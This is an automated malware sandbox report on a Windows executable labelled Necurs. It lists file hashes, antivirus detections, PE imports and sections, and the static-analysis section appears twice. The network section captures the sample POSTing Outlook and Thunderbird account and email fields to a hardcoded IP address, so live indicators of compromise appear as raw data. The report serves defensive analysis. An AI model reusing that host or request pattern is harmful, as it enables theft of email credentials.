- [*] MalFamily: "Necurs"
- [*] MalScore: 10.0
- [*] File Name: "Exes_69440bc1.exe"
- [*] File Size: 401408
- [*] File Type: "PE32 executable (GUI) Intel 80386, for MS Windows"
- [*] SHA256: "7edc56dd709d0af1c2f54cda7d8808c1748fa3370aa9319945dca85943d46710"
- [*] MD5: "cfd3bbce7cc2c03f842c8eaa39e830d3"
- [*] SHA1: "79b7542eb66a1907802f80db85c879ff6ec423b5"
- [*] SHA512: "7da934afea190b3bcaf50e2a75f2d8f2d8565ee5dd708fdb9e0b84927157d32beb6ccad5562ae43adc4c38de9ad7f2ac3ff811b24877ce4b6630625777b5376d"
- [*] CRC32: "69440BC1"
- [*] SSDEEP: "6144:zBR7zHs5tUeTUSwhJExsyWeTCe1B5TOrdHhjpMCd12I8udh2CF3686/13:tR3szrH5MdB1Vd12YdsCF3686Z"
- [*] Process Execution: []
- [*] Signatures Detected: [
- {
- "Description": "HTTP traffic contains suspicious features which may be indicative of malware related traffic",
- "Details": [
- {
- "post_no_referer": "HTTP traffic contains a POST request with no referer header"
- },
- {
- "post_no_useragent": "HTTP traffic contains a POST request with no user-agent header"
- },
- {
- "ip_hostname": "HTTP connection was made to an IP address rather than domain name"
- },
- {
- "suspicious_request": "http://163.172.84.54/filename.php"
- }
- ]
- },
- {
- "Description": "Performs some HTTP requests",
- "Details": [
- {
- "url": "http://163.172.84.54/filename.php"
- }
- ]
- },
- {
- "Description": "Writes a potential ransom message to disk",
- "Details": [
- {
- "ransom_file": "Noriben.py"
- },
- {
- "ransom_file": "readme.txt"
- }
- ]
- },
- {
- "Description": "File has been identified by 52 Antiviruses on VirusTotal as malicious",
- "Details": [
- {
- "MicroWorld-eScan": "Trojan.GenericKD.31914429"
- },
- {
- "FireEye": "Generic.mg.cfd3bbce7cc2c03f"
- },
- {
- "CAT-QuickHeal": "Trojandropper.Necurs"
- },
- {
- "McAfee": "RDN/Generic.grp"
- },
- {
- "Cylance": "Unsafe"
- },
- {
- "Alibaba": "TrojanDropper:Win32/Necurs.771aab12"
- },
- {
- "K7GW": "Riskware ( 0040eff71 )"
- },
- {
- "K7AntiVirus": "Riskware ( 0040eff71 )"
- },
- {
- "Arcabit": "Trojan.Generic.D1E6F9BD"
- },
- {
- "Invincea": "heuristic"
- },
- {
- "Symantec": "Ransom.Crysis"
- },
- {
- "APEX": "Malicious"
- },
- {
- "Avast": "Win32:Malware-gen"
- },
- {
- "Kaspersky": "Trojan-Dropper.Win32.Necurs.abas"
- },
- {
- "BitDefender": "Trojan.GenericKD.31914429"
- },
- {
- "NANO-Antivirus": "Trojan.Win32.Necurs.fpotwi"
- },
- {
- "Paloalto": "generic.ml"
- },
- {
- "ViRobot": "Trojan.Win32.Agent.401408.AN"
- },
- {
- "Rising": "Dropper.Necurs!8.C43 (CLOUD)"
- },
- {
- "Ad-Aware": "Trojan.GenericKD.31914429"
- },
- {
- "Emsisoft": "Trojan.GenericKD.31914429 (B)"
- },
- {
- "Comodo": "Malware@#uz9bso1tas4q"
- },
- {
- "DrWeb": "Trojan.PWS.Siggen2.12283"
- },
- {
- "TrendMicro": "Trojan.Win32.NECURS.USWE"
- },
- {
- "McAfee-GW-Edition": "BehavesLike.Win32.Generic.fh"
- },
- {
- "Trapmine": "malicious.high.ml.score"
- },
- {
- "Sophos": "Troj/Wonton-AFD"
- },
- {
- "SentinelOne": "DFI - Malicious PE"
- },
- {
- "Cyren": "W32/Trojan.ZDUJ-4279"
- },
- {
- "ESET-NOD32": "a variant of Win32/Kryptik.GSLS"
- },
- {
- "Webroot": "W32.Trojan.GenKD"
- },
- {
- "Antiy-AVL": "Trojan[Dropper]/Win32.Necurs"
- },
- {
- "Microsoft": "Trojan:Win32/Occamy.C"
- },
- {
- "Endgame": "malicious (high confidence)"
- },
- {
- "AegisLab": "Trojan.Win32.Necurs.4!c"
- },
- {
- "ZoneAlarm": "Trojan-Dropper.Win32.Necurs.abas"
- },
- {
- "GData": "Trojan.GenericKD.31914429"
- },
- {
- "TACHYON": "Trojan-Dropper/W32.Necurs.401408"
- },
- {
- "AhnLab-V3": "Trojan/Win32.Agent.C3169420"
- },
- {
- "VBA32": "TrojanDropper.Necurs"
- },
- {
- "ALYac": "Trojan.Agent.Azden"
- },
- {
- "Malwarebytes": "Trojan.Necurs"
- },
- {
- "TrendMicro-HouseCall": "Trojan.Win32.NECURS.USWE"
- },
- {
- "Tencent": "Win32.Trojan-dropper.Necurs.Tdzf"
- },
- {
- "Yandex": "Trojan.DR.Necurs!epG2dZg83x0"
- },
- {
- "Ikarus": "Trojan.Win32.Crypt"
- },
- {
- "Fortinet": "W32/Necurs.ABAS!tr"
- },
- {
- "AVG": "Win32:Malware-gen"
- },
- {
- "Cybereason": "malicious.e7cc2c"
- },
- {
- "Panda": "Trj/GdSda.A"
- },
- {
- "CrowdStrike": "win/malicious_confidence_90% (W)"
- },
- {
- "Qihoo-360": "HEUR/QVM10.2.BA6B.Malware.Gen"
- }
- ]
- }
- ]
- [*] Started Service: []
- [*] Executed Commands: []
- [*] Mutexes: []
- [*] Modified Files: []
- [*] Deleted Files: []
- [*] Modified Registry Keys: []
- [*] Deleted Registry Keys: []
- [*] DNS Communications: []
- [*] Domains: []
- [*] Network Communication - ICMP: []
- [*] Network Communication - HTTP: [
- {
- "count": 1,
- "body": "{\"outlook-accounts\":null,\"thunderbird-emails\":null}",
- "uri": "http://163.172.84.54/filename.php",
- "user-agent": "",
- "method": "POST",
- "host": "163.172.84.54",
- "version": "1.1",
- "path": "/filename.php",
- "data": "POST /filename.php HTTP/1.1\r\nHost: 163.172.84.54\r\nContent-Length: 51\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n{\"outlook-accounts\":null,\"thunderbird-emails\":null}",
- "port": 80
- },
- {
- "count": 1,
- "body": "{\"outlook-emails\":null}",
- "uri": "http://163.172.84.54/filename.php",
- "user-agent": "",
- "method": "POST",
- "host": "163.172.84.54",
- "version": "1.1",
- "path": "/filename.php",
- "data": "POST /filename.php HTTP/1.1\r\nHost: 163.172.84.54\r\nContent-Length: 23\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n{\"outlook-emails\":null}",
- "port": 80
- }
- ]
- [*] Network Communication - SMTP: []
- [*] Network Communication - Hosts: []
- [*] Network Communication - IRC: []
- [*] Static Analysis: {
- "pe": {
- "peid_signatures": null,
- "imports": [
- {
- "imports": [
- {
- "name": "FindClose",
- "address": "0x40101c"
- },
- {
- "name": "GetVersionExA",
- "address": "0x401020"
- },
- {
- "name": "HeapFree",
- "address": "0x401024"
- },
- {
- "name": "FreeLibrary",
- "address": "0x401028"
- },
- {
- "name": "GetStdHandle",
- "address": "0x40102c"
- },
- {
- "name": "GetVersionExW",
- "address": "0x401030"
- },
- {
- "name": "ExitProcess",
- "address": "0x401034"
- },
- {
- "name": "CompareStringW",
- "address": "0x401038"
- },
- {
- "name": "CompareStringA",
- "address": "0x40103c"
- },
- {
- "name": "GetLastError",
- "address": "0x401040"
- },
- {
- "name": "GetLocaleInfoW",
- "address": "0x401044"
- },
- {
- "name": "VirtualQuery",
- "address": "0x401048"
- },
- {
- "name": "GetSystemInfo",
- "address": "0x40104c"
- },
- {
- "name": "VirtualProtect",
- "address": "0x401050"
- },
- {
- "name": "UnhandledExceptionFilter",
- "address": "0x401054"
- },
- {
- "name": "GetCurrentProcess",
- "address": "0x401058"
- },
- {
- "name": "TerminateProcess",
- "address": "0x40105c"
- },
- {
- "name": "IsValidCodePage",
- "address": "0x401060"
- },
- {
- "name": "IsValidLocale",
- "address": "0x401064"
- },
- {
- "name": "EnumSystemLocalesA",
- "address": "0x401068"
- },
- {
- "name": "LoadLibraryA",
- "address": "0x40106c"
- },
- {
- "name": "GetProcAddress",
- "address": "0x401070"
- },
- {
- "name": "VirtualAlloc",
- "address": "0x401074"
- },
- {
- "name": "GetModuleHandleA",
- "address": "0x401078"
- },
- {
- "name": "GetCommandLineA",
- "address": "0x40107c"
- },
- {
- "name": "GetTimeZoneInformation",
- "address": "0x401080"
- },
- {
- "name": "InterlockedDecrement",
- "address": "0x401084"
- },
- {
- "name": "GetStartupInfoW",
- "address": "0x401088"
- },
- {
- "name": "SetUnhandledExceptionFilter",
- "address": "0x40108c"
- },
- {
- "name": "WriteFile",
- "address": "0x401090"
- },
- {
- "name": "GetModuleFileNameA",
- "address": "0x401094"
- },
- {
- "name": "GetModuleFileNameW",
- "address": "0x401098"
- },
- {
- "name": "FreeEnvironmentStringsA",
- "address": "0x40109c"
- },
- {
- "name": "MultiByteToWideChar",
- "address": "0x4010a0"
- },
- {
- "name": "GetEnvironmentStrings",
- "address": "0x4010a4"
- },
- {
- "name": "FreeEnvironmentStringsW",
- "address": "0x4010a8"
- },
- {
- "name": "GetEnvironmentStringsW",
- "address": "0x4010ac"
- },
- {
- "name": "GetCommandLineW",
- "address": "0x4010b0"
- },
- {
- "name": "SetHandleCount",
- "address": "0x4010b4"
- },
- {
- "name": "GetFileType",
- "address": "0x4010b8"
- },
- {
- "name": "GetStartupInfoA",
- "address": "0x4010bc"
- },
- {
- "name": "DeleteCriticalSection",
- "address": "0x4010c0"
- },
- {
- "name": "GetModuleHandleW",
- "address": "0x4010c4"
- },
- {
- "name": "TlsGetValue",
- "address": "0x4010c8"
- },
- {
- "name": "TlsAlloc",
- "address": "0x4010cc"
- },
- {
- "name": "TlsSetValue",
- "address": "0x4010d0"
- },
- {
- "name": "TlsFree",
- "address": "0x4010d4"
- },
- {
- "name": "InterlockedIncrement",
- "address": "0x4010d8"
- },
- {
- "name": "SetLastError",
- "address": "0x4010dc"
- },
- {
- "name": "GetCurrentThreadId",
- "address": "0x4010e0"
- },
- {
- "name": "GetCurrentThread",
- "address": "0x4010e4"
- },
- {
- "name": "HeapDestroy",
- "address": "0x4010e8"
- },
- {
- "name": "HeapCreate",
- "address": "0x4010ec"
- },
- {
- "name": "VirtualFree",
- "address": "0x4010f0"
- },
- {
- "name": "QueryPerformanceCounter",
- "address": "0x4010f4"
- },
- {
- "name": "GetTickCount",
- "address": "0x4010f8"
- },
- {
- "name": "GetCurrentProcessId",
- "address": "0x4010fc"
- },
- {
- "name": "GetSystemTimeAsFileTime",
- "address": "0x401100"
- },
- {
- "name": "GetCPInfo",
- "address": "0x401104"
- },
- {
- "name": "GetACP",
- "address": "0x401108"
- },
- {
- "name": "GetOEMCP",
- "address": "0x40110c"
- },
- {
- "name": "OutputDebugStringA",
- "address": "0x401110"
- },
- {
- "name": "LeaveCriticalSection",
- "address": "0x401114"
- },
- {
- "name": "FatalAppExitA",
- "address": "0x401118"
- },
- {
- "name": "EnterCriticalSection",
- "address": "0x40111c"
- },
- {
- "name": "SetConsoleCtrlHandler",
- "address": "0x401120"
- },
- {
- "name": "InterlockedExchange",
- "address": "0x401124"
- },
- {
- "name": "LoadLibraryExA",
- "address": "0x401128"
- },
- {
- "name": "InitializeCriticalSection",
- "address": "0x40112c"
- },
- {
- "name": "HeapAlloc",
- "address": "0x401130"
- },
- {
- "name": "Sleep",
- "address": "0x401134"
- },
- {
- "name": "HeapReAlloc",
- "address": "0x401138"
- },
- {
- "name": "RtlUnwind",
- "address": "0x40113c"
- },
- {
- "name": "LCMapStringA",
- "address": "0x401140"
- },
- {
- "name": "WideCharToMultiByte",
- "address": "0x401144"
- },
- {
- "name": "LCMapStringW",
- "address": "0x401148"
- },
- {
- "name": "GetStringTypeA",
- "address": "0x40114c"
- },
- {
- "name": "GetStringTypeW",
- "address": "0x401150"
- },
- {
- "name": "GetTimeFormatA",
- "address": "0x401154"
- },
- {
- "name": "GetDateFormatA",
- "address": "0x401158"
- },
- {
- "name": "GetUserDefaultLCID",
- "address": "0x40115c"
- },
- {
- "name": "GetLocaleInfoA",
- "address": "0x401160"
- },
- {
- "name": "SetEnvironmentVariableA",
- "address": "0x401164"
- }
- ],
- "dll": "KERNEL32.dll"
- },
- {
- "imports": [
- {
- "name": "SetWindowLongW",
- "address": "0x40116c"
- },
- {
- "name": "CreateWindowExW",
- "address": "0x401170"
- },
- {
- "name": "SetWindowTextW",
- "address": "0x401174"
- },
- {
- "name": "CreateWindowExA",
- "address": "0x401178"
- },
- {
- "name": "PostMessageW",
- "address": "0x40117c"
- },
- {
- "name": "UnregisterClassA",
- "address": "0x401180"
- },
- {
- "name": "DestroyWindow",
- "address": "0x401184"
- },
- {
- "name": "LoadStringW",
- "address": "0x401188"
- },
- {
- "name": "GetMenuStringW",
- "address": "0x40118c"
- },
- {
- "name": "DefWindowProcW",
- "address": "0x401190"
- },
- {
- "name": "SendMessageW",
- "address": "0x401194"
- },
- {
- "name": "RegisterClassW",
- "address": "0x401198"
- }
- ],
- "dll": "USER32.dll"
- },
- {
- "imports": [
- {
- "name": "RegOpenKeyExA",
- "address": "0x401000"
- },
- {
- "name": "RegEnumValueA",
- "address": "0x401004"
- },
- {
- "name": "RegSetValueExA",
- "address": "0x401008"
- },
- {
- "name": "RegOpenKeyExW",
- "address": "0x40100c"
- }
- ],
- "dll": "ADVAPI32.dll"
- },
- {
- "imports": [
- {
- "name": "ImageList_Add",
- "address": "0x401014"
- }
- ],
- "dll": "COMCTL32.dll"
- }
- ],
- "digital_signers": null,
- "exported_dll_name": null,
- "actual_checksum": "0x0006d473",
- "overlay": null,
- "imagebase": "0x00400000",
- "reported_checksum": "0x00000000",
- "icon_hash": null,
- "entrypoint": "0x00446f6d",
- "timestamp": "2017-06-26 19:27:00",
- "osversion": "4.0",
- "sections": [
- {
- "name": ".text",
- "characteristics": "IMAGE_SCN_CNT_CODE|IMAGE_SCN_MEM_SHARED|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ",
- "virtual_address": "0x00001000",
- "size_of_data": "0x0005b000",
- "entropy": "6.41",
- "raw_address": "0x00001000",
- "virtual_size": "0x0005a538",
- "characteristics_raw": "0x70000020"
- },
- {
- "name": ".data",
- "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_SHARED|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE",
- "virtual_address": "0x0005c000",
- "size_of_data": "0x00003000",
- "entropy": "4.54",
- "raw_address": "0x0005c000",
- "virtual_size": "0x00002d80",
- "characteristics_raw": "0xd0000040"
- },
- {
- "name": ".sxdata",
- "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_LNK_INFO|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE",
- "virtual_address": "0x0005f000",
- "size_of_data": "0x00001000",
- "entropy": "0.07",
- "raw_address": "0x0005f000",
- "virtual_size": "0x0000006c",
- "characteristics_raw": "0xc0000240"
- },
- {
- "name": ".reloc",
- "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_DISCARDABLE|IMAGE_SCN_MEM_READ",
- "virtual_address": "0x00060000",
- "size_of_data": "0x00002000",
- "entropy": "3.98",
- "raw_address": "0x00060000",
- "virtual_size": "0x000011aa",
- "characteristics_raw": "0x42000040"
- }
- ],
- "resources": [],
- "dirents": [
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_EXPORT",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x0005abdc",
- "name": "IMAGE_DIRECTORY_ENTRY_IMPORT",
- "size": "0x00000064"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_RESOURCE",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_EXCEPTION",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_SECURITY",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00060000",
- "name": "IMAGE_DIRECTORY_ENTRY_BASERELOC",
- "size": "0x00000eec"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_DEBUG",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_COPYRIGHT",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_GLOBALPTR",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_TLS",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00001000",
- "name": "IMAGE_DIRECTORY_ENTRY_IAT",
- "size": "0x000001a0"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_RESERVED",
- "size": "0x00000000"
- }
- ],
- "exports": [],
- "guest_signers": {},
- "imphash": "7073758031d4012622cea53183697aac",
- "icon_fuzzy": null,
- "icon": null,
- "pdbpath": null,
- "imported_dll_count": 4,
- "versioninfo": []
- }
- }
- [*] Resolved APIs: []
- [*] Static Analysis: {
- "pe": {
- "peid_signatures": null,
- "imports": [
- {
- "imports": [
- {
- "name": "FindClose",
- "address": "0x40101c"
- },
- {
- "name": "GetVersionExA",
- "address": "0x401020"
- },
- {
- "name": "HeapFree",
- "address": "0x401024"
- },
- {
- "name": "FreeLibrary",
- "address": "0x401028"
- },
- {
- "name": "GetStdHandle",
- "address": "0x40102c"
- },
- {
- "name": "GetVersionExW",
- "address": "0x401030"
- },
- {
- "name": "ExitProcess",
- "address": "0x401034"
- },
- {
- "name": "CompareStringW",
- "address": "0x401038"
- },
- {
- "name": "CompareStringA",
- "address": "0x40103c"
- },
- {
- "name": "GetLastError",
- "address": "0x401040"
- },
- {
- "name": "GetLocaleInfoW",
- "address": "0x401044"
- },
- {
- "name": "VirtualQuery",
- "address": "0x401048"
- },
- {
- "name": "GetSystemInfo",
- "address": "0x40104c"
- },
- {
- "name": "VirtualProtect",
- "address": "0x401050"
- },
- {
- "name": "UnhandledExceptionFilter",
- "address": "0x401054"
- },
- {
- "name": "GetCurrentProcess",
- "address": "0x401058"
- },
- {
- "name": "TerminateProcess",
- "address": "0x40105c"
- },
- {
- "name": "IsValidCodePage",
- "address": "0x401060"
- },
- {
- "name": "IsValidLocale",
- "address": "0x401064"
- },
- {
- "name": "EnumSystemLocalesA",
- "address": "0x401068"
- },
- {
- "name": "LoadLibraryA",
- "address": "0x40106c"
- },
- {
- "name": "GetProcAddress",
- "address": "0x401070"
- },
- {
- "name": "VirtualAlloc",
- "address": "0x401074"
- },
- {
- "name": "GetModuleHandleA",
- "address": "0x401078"
- },
- {
- "name": "GetCommandLineA",
- "address": "0x40107c"
- },
- {
- "name": "GetTimeZoneInformation",
- "address": "0x401080"
- },
- {
- "name": "InterlockedDecrement",
- "address": "0x401084"
- },
- {
- "name": "GetStartupInfoW",
- "address": "0x401088"
- },
- {
- "name": "SetUnhandledExceptionFilter",
- "address": "0x40108c"
- },
- {
- "name": "WriteFile",
- "address": "0x401090"
- },
- {
- "name": "GetModuleFileNameA",
- "address": "0x401094"
- },
- {
- "name": "GetModuleFileNameW",
- "address": "0x401098"
- },
- {
- "name": "FreeEnvironmentStringsA",
- "address": "0x40109c"
- },
- {
- "name": "MultiByteToWideChar",
- "address": "0x4010a0"
- },
- {
- "name": "GetEnvironmentStrings",
- "address": "0x4010a4"
- },
- {
- "name": "FreeEnvironmentStringsW",
- "address": "0x4010a8"
- },
- {
- "name": "GetEnvironmentStringsW",
- "address": "0x4010ac"
- },
- {
- "name": "GetCommandLineW",
- "address": "0x4010b0"
- },
- {
- "name": "SetHandleCount",
- "address": "0x4010b4"
- },
- {
- "name": "GetFileType",
- "address": "0x4010b8"
- },
- {
- "name": "GetStartupInfoA",
- "address": "0x4010bc"
- },
- {
- "name": "DeleteCriticalSection",
- "address": "0x4010c0"
- },
- {
- "name": "GetModuleHandleW",
- "address": "0x4010c4"
- },
- {
- "name": "TlsGetValue",
- "address": "0x4010c8"
- },
- {
- "name": "TlsAlloc",
- "address": "0x4010cc"
- },
- {
- "name": "TlsSetValue",
- "address": "0x4010d0"
- },
- {
- "name": "TlsFree",
- "address": "0x4010d4"
- },
- {
- "name": "InterlockedIncrement",
- "address": "0x4010d8"
- },
- {
- "name": "SetLastError",
- "address": "0x4010dc"
- },
- {
- "name": "GetCurrentThreadId",
- "address": "0x4010e0"
- },
- {
- "name": "GetCurrentThread",
- "address": "0x4010e4"
- },
- {
- "name": "HeapDestroy",
- "address": "0x4010e8"
- },
- {
- "name": "HeapCreate",
- "address": "0x4010ec"
- },
- {
- "name": "VirtualFree",
- "address": "0x4010f0"
- },
- {
- "name": "QueryPerformanceCounter",
- "address": "0x4010f4"
- },
- {
- "name": "GetTickCount",
- "address": "0x4010f8"
- },
- {
- "name": "GetCurrentProcessId",
- "address": "0x4010fc"
- },
- {
- "name": "GetSystemTimeAsFileTime",
- "address": "0x401100"
- },
- {
- "name": "GetCPInfo",
- "address": "0x401104"
- },
- {
- "name": "GetACP",
- "address": "0x401108"
- },
- {
- "name": "GetOEMCP",
- "address": "0x40110c"
- },
- {
- "name": "OutputDebugStringA",
- "address": "0x401110"
- },
- {
- "name": "LeaveCriticalSection",
- "address": "0x401114"
- },
- {
- "name": "FatalAppExitA",
- "address": "0x401118"
- },
- {
- "name": "EnterCriticalSection",
- "address": "0x40111c"
- },
- {
- "name": "SetConsoleCtrlHandler",
- "address": "0x401120"
- },
- {
- "name": "InterlockedExchange",
- "address": "0x401124"
- },
- {
- "name": "LoadLibraryExA",
- "address": "0x401128"
- },
- {
- "name": "InitializeCriticalSection",
- "address": "0x40112c"
- },
- {
- "name": "HeapAlloc",
- "address": "0x401130"
- },
- {
- "name": "Sleep",
- "address": "0x401134"
- },
- {
- "name": "HeapReAlloc",
- "address": "0x401138"
- },
- {
- "name": "RtlUnwind",
- "address": "0x40113c"
- },
- {
- "name": "LCMapStringA",
- "address": "0x401140"
- },
- {
- "name": "WideCharToMultiByte",
- "address": "0x401144"
- },
- {
- "name": "LCMapStringW",
- "address": "0x401148"
- },
- {
- "name": "GetStringTypeA",
- "address": "0x40114c"
- },
- {
- "name": "GetStringTypeW",
- "address": "0x401150"
- },
- {
- "name": "GetTimeFormatA",
- "address": "0x401154"
- },
- {
- "name": "GetDateFormatA",
- "address": "0x401158"
- },
- {
- "name": "GetUserDefaultLCID",
- "address": "0x40115c"
- },
- {
- "name": "GetLocaleInfoA",
- "address": "0x401160"
- },
- {
- "name": "SetEnvironmentVariableA",
- "address": "0x401164"
- }
- ],
- "dll": "KERNEL32.dll"
- },
- {
- "imports": [
- {
- "name": "SetWindowLongW",
- "address": "0x40116c"
- },
- {
- "name": "CreateWindowExW",
- "address": "0x401170"
- },
- {
- "name": "SetWindowTextW",
- "address": "0x401174"
- },
- {
- "name": "CreateWindowExA",
- "address": "0x401178"
- },
- {
- "name": "PostMessageW",
- "address": "0x40117c"
- },
- {
- "name": "UnregisterClassA",
- "address": "0x401180"
- },
- {
- "name": "DestroyWindow",
- "address": "0x401184"
- },
- {
- "name": "LoadStringW",
- "address": "0x401188"
- },
- {
- "name": "GetMenuStringW",
- "address": "0x40118c"
- },
- {
- "name": "DefWindowProcW",
- "address": "0x401190"
- },
- {
- "name": "SendMessageW",
- "address": "0x401194"
- },
- {
- "name": "RegisterClassW",
- "address": "0x401198"
- }
- ],
- "dll": "USER32.dll"
- },
- {
- "imports": [
- {
- "name": "RegOpenKeyExA",
- "address": "0x401000"
- },
- {
- "name": "RegEnumValueA",
- "address": "0x401004"
- },
- {
- "name": "RegSetValueExA",
- "address": "0x401008"
- },
- {
- "name": "RegOpenKeyExW",
- "address": "0x40100c"
- }
- ],
- "dll": "ADVAPI32.dll"
- },
- {
- "imports": [
- {
- "name": "ImageList_Add",
- "address": "0x401014"
- }
- ],
- "dll": "COMCTL32.dll"
- }
- ],
- "digital_signers": null,
- "exported_dll_name": null,
- "actual_checksum": "0x0006d473",
- "overlay": null,
- "imagebase": "0x00400000",
- "reported_checksum": "0x00000000",
- "icon_hash": null,
- "entrypoint": "0x00446f6d",
- "timestamp": "2017-06-26 19:27:00",
- "osversion": "4.0",
- "sections": [
- {
- "name": ".text",
- "characteristics": "IMAGE_SCN_CNT_CODE|IMAGE_SCN_MEM_SHARED|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ",
- "virtual_address": "0x00001000",
- "size_of_data": "0x0005b000",
- "entropy": "6.41",
- "raw_address": "0x00001000",
- "virtual_size": "0x0005a538",
- "characteristics_raw": "0x70000020"
- },
- {
- "name": ".data",
- "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_SHARED|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE",
- "virtual_address": "0x0005c000",
- "size_of_data": "0x00003000",
- "entropy": "4.54",
- "raw_address": "0x0005c000",
- "virtual_size": "0x00002d80",
- "characteristics_raw": "0xd0000040"
- },
- {
- "name": ".sxdata",
- "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_LNK_INFO|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE",
- "virtual_address": "0x0005f000",
- "size_of_data": "0x00001000",
- "entropy": "0.07",
- "raw_address": "0x0005f000",
- "virtual_size": "0x0000006c",
- "characteristics_raw": "0xc0000240"
- },
- {
- "name": ".reloc",
- "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_DISCARDABLE|IMAGE_SCN_MEM_READ",
- "virtual_address": "0x00060000",
- "size_of_data": "0x00002000",
- "entropy": "3.98",
- "raw_address": "0x00060000",
- "virtual_size": "0x000011aa",
- "characteristics_raw": "0x42000040"
- }
- ],
- "resources": [],
- "dirents": [
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_EXPORT",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x0005abdc",
- "name": "IMAGE_DIRECTORY_ENTRY_IMPORT",
- "size": "0x00000064"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_RESOURCE",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_EXCEPTION",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_SECURITY",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00060000",
- "name": "IMAGE_DIRECTORY_ENTRY_BASERELOC",
- "size": "0x00000eec"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_DEBUG",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_COPYRIGHT",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_GLOBALPTR",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_TLS",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00001000",
- "name": "IMAGE_DIRECTORY_ENTRY_IAT",
- "size": "0x000001a0"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_RESERVED",
- "size": "0x00000000"
- }
- ],
- "exports": [],
- "guest_signers": {},
- "imphash": "7073758031d4012622cea53183697aac",
- "icon_fuzzy": null,
- "icon": null,
- "pdbpath": null,
- "imported_dll_count": 4,
- "versioninfo": []
- }
- }